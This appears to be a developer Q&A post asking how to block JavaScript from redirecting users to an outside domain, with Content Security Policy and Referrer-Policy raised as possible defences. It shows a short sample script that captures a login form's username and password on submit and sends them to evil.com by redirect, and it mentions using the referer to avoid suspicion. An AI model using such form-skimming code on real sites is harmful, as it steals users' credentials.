# Prevent javascript cross-origin redirect by window.location.href

Tags: javascript, redirect, xss, content-security-policy, http-referer

Is there a way to prevent this code from redirecting users to domains not whitelisted and stealing their data in the process?

```
const form = document.getElementsByTagName('form')[0];

form.addEventListener('submit', stealCredentials);

function stealCredentials() {
    const login = document.getElementsByName('login')[0].value;
    const password = document.getElementsByName('password')[0].value;

    window.location.href = 'http://evil.com/?login=' + login + '&password=' + password
}
```

Is there a clean way to do it? Like Content Security Policy or something similar? `connect-src` doesn't cover this case.

I suppose evil.com could then use the referer to redirect the user to where he came from, thus (partly) avoiding user suspicion.
The `Referrer-Policy` header could mitigate that but at the cost of hindering cross-origin features relying on referer (e.g. analytics).